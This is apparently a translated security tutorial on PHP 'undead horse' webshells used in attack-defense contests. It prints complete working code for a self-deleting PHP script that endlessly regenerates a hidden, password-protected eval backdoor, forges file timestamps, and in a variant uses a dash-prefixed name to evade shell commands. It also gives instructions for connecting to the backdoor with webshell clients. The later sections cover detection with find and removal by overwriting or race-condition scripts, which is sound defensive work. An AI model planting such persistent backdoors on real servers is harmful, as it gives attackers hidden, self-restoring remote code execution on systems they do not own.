Using and countering undead horses (via race conditions), and variant undead horses

An undead horse (also called an immortal horse) is a kind of memory horse: a webshell that lives inside a running PHP process and keeps regenerating a Trojan file in a specified directory indefinitely.

The PHP undead horse is used here as the example.

Test code:

<?php
    ignore_user_abort(true);
    set_time_limit(0);
    unlink(__FILE__);
    $file = '.test.php';
    $code = '<?php if(md5($_GET["pass"])=="098f6bcd4621d373cade4e832627b4f6"){@eval($_POST[test]);} ?>';
    while (1){
        file_put_contents($file,$code);
        system('touch -m -d "2018-12-01 09:10:12" .test.php');
        usleep(5000);
    }
?>

The code above is the simplest undead horse. Its purpose is to create a PHP file named “.test.php”, which contains a password-protected backdoor that allows execution of arbitrary PHP code.

Detailed explanation of the code:

1. ignore_user_abort(true);

Tells PHP to ignore client aborts, so the script keeps running even if the user stops loading the page in the browser.

2. set_time_limit(0);

Sets the script execution time limit to 0, so the script can run indefinitely without being interrupted by PHP’s execution time limit.

3. unlink(__FILE__);

Deletes the currently executing script file, in an attempt to hide the script from discovery.

4. $file = '.test.php';

Defines the variable $file, which holds the name of the file to be written, namely “.test.php”.

Because the name begins with ., the file is hidden (a plain ls does not show it).

5. $code = '<?php if(md5($_GET["pass"])=="098f6bcd4621d373cade4e832627b4f6"){@eval($_POST[test]);} ?>';

Defines the variable $code, which holds the PHP code of the backdoor. That code first checks whether the MD5 hash of the “pass” parameter passed via GET equals “098f6bcd4621d373cade4e832627b4f6”. If the check passes, it evals the PHP code passed in the POST parameter named “test”.

6. while (1){…}

This is an infinite loop that keeps doing the following:

a. file_put_contents($file, $code);

Writes the $code defined above into $file, i.e. “.test.php”, so that the file content is continuously restored.

b. system('touch -m -d "2018-12-01 09:10:12" .test.php');

Uses system() to run the touch command, setting the modification time of “.test.php” to “2018-12-01 09:10:12”. This forges the file’s last-modified time so that it does not stand out as recently changed.

c. usleep(5000);

Waits 5 milliseconds (5000 microseconds) before the next iteration. The sleep reduces the script’s resource consumption so that its abnormal activity is less likely to be noticed by the system.

Here 098f6bcd4621d373cade4e832627b4f6 is the MD5 hash of the password. It is hashed so that other teams cannot simply take over our Trojan. This is only for testing; the plaintext password is test.

Upload the PHP file and then access it.

Once accessed, the hidden undead-horse file .test.php is generated in a loop in the same directory.

Use AntSword or China Chopper to connect to the generated webshell:

http://path to the file/.test.php?pass=test

Connection password: test

If you try to delete the file, you will find that it immediately reappears, as if it could not be deleted: this is the undead horse, because it lives on inside the PHP process and rewrites the file.

You cannot see it with commands like ls and ll, because it is a dot file, and as noted in the code above the uploaded script has already deleted itself.

You can only find it by looking for recently changed files:

find ./ -cmin -30 # list files whose status changed in the last 30 minutes

This works even though the modification time was forged: -cmin keys on the inode change time (ctime), which every rewrite of the file updates and which touch -m cannot set back, whereas -mmin would miss the file because its mtime has been pushed back to 2018.

Alternatively, if you know the name of the undead horse, you can search for it by name with find (./ means the current directory).
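As an added example (not from the original post), the following sh functions turn the find check above into a reusable scan: the first keys on the timestamp mismatch that the touch -m trick leaves behind, the second lists PHP files using the . and - naming tricks; the directory and window are its parameters.

```shell
#!/bin/sh
# Added example (not part of the original post): scan a web root for files whose
# inode change time is fresh while their modification time is old. The undead
# horse rewrites its file every few milliseconds (fresh ctime) and pins the
# mtime to 2018 with `touch -m`, so this mismatch is its fingerprint.

find_forged_mtime() {
    # $1 = directory to scan (e.g. the web root), $2 = window in minutes.
    # Prints every regular file changed within the window whose modification
    # time is nonetheless more than one day old. Paths are printed with their
    # directory prefix, so names starting with '-' or '.' are shown safely.
    find "$1" -type f -cmin "-$2" -mtime +1 -print
}

list_hidden_or_dashed_php() {
    # Companion check: PHP files whose names start with '.' or '-', the two
    # naming tricks described on this page. $1 = directory to scan.
    find "$1" -type f \( -name '.*.php' -o -name '-*.php' \) -print
}
```

Run it against the web root, e.g. find_forged_mtime /var/www/html 30; any hit is worth reading, since a legitimate deployment rarely backdates mtime while ctime stays current.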

Countermeasures:

1. Suppress the undead horse by writing a file of the same name

Test code:

<?php
    ignore_user_abort(true);
    set_time_limit(0);
    unlink(__FILE__);
    $file = '.test.php';
    $code = 'come on!';
    while (1){
        file_put_contents($file,$code);
        system('touch -m -d "2018-12-01 09:10:12" .test.php');
        usleep(1000);
    }
?>

Note: the usleep interval must be shorter than the undead horse’s, so that our script writes the file more often and wins the race. Apart from that, just change $code to harmless content.

Assuming the file is named killshell.php, upload it and access it.

Note: you must access it first to trigger the writing of the file.

When I tried to connect to the webshell again, the connection no longer worked and the returned data was empty.

View the contents of the webshell on the server:

As you can see, the content is no longer the one-line Trojan but the harmless content written by our script.

2. Kill the undead horse with a race condition

Test code (a bash script):

#!/bin/bash
while true
do
    # kill -9 <process ID>   (uncomment and fill in the PID of the undead horse if known)
    rm -rf .test.php
done

If you can find the process ID of the undead horse, you can also run the kill command together with the rm command.

Use top | grep httpd, or ps aux to list all processes, to find the process to be killed.

Create the killing script:

vim rmshell.sh

Give it full permissions:

chmod 777 rmshell.sh

Run the script continuously in the background:

nohup ./rmshell.sh &

When I checked for the undead horse again, it no longer existed.

Just check to confirm.

Extension: variant undead horse

The Trojan written here has a name starting with - instead of .

On the Linux command line, - introduces a command option. If a command is run on a file named this way, the file name is parsed as an option; since no such option exists, an error is reported and the command does not run. This variant also takes effect immediately, but its drawback is that it is less concealed than a name starting with .

<?php
    ignore_user_abort(true);
    set_time_limit(0);
    unlink(__FILE__);
    $file = '-test.php';
    $code = '<?php if(md5($_GET["pass"])=="098f6bcd4621d373cade4e832627b4f6"){@eval($_POST[test]);} ?>';
    while (1){
        file_put_contents($file,$code);
        system('touch -m -d "2018-12-01 09:10:12" -test.php');
        usleep(5000);
    }
?>
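As an added example (not the post’s rmshell.sh), here is a removal routine that serves both the race-condition kill script above and this - variant: a name such as -test.php is read by rm as an option, so the plain rm -rf -test.php from the loop above fails, while prefixing ./ (or passing -- before the name) makes it an ordinary operand again.

```shell
#!/bin/sh
# Added example, not the original post's rmshell.sh: remove a regenerated
# webshell file whose name may start with '.' or '-'.

safe_path() {
    # Turn a bare file name into a path no command can mistake for an option.
    case "$1" in
        -*) printf './%s\n' "$1" ;;
        *)  printf '%s\n' "$1" ;;
    esac
}

remove_regenerated_file() {
    # $1 = file name written by the undead horse (may start with '.' or '-')
    # $2 = number of removal attempts; the writer re-creates the file every
    #      few milliseconds, so a single attempt is rarely enough.
    # Prints how many times the file was present and deleted. Zero removals
    # over many attempts means the writing process has stopped or been killed.
    rr_path=$(safe_path "$1")
    rr_count=0
    rr_i=0
    while [ "$rr_i" -lt "$2" ]; do
        if [ -e "$rr_path" ]; then
            rm -f -- "$rr_path" && rr_count=$((rr_count + 1))
        fi
        rr_i=$((rr_i + 1))
    done
    echo "$rr_count"
}

# On a live system (not run here), combine this with killing the worker
# process that hosts the loop, found via `ps aux` as described above:
#   kill -9 "$PID"; remove_regenerated_file -test.php 1000
```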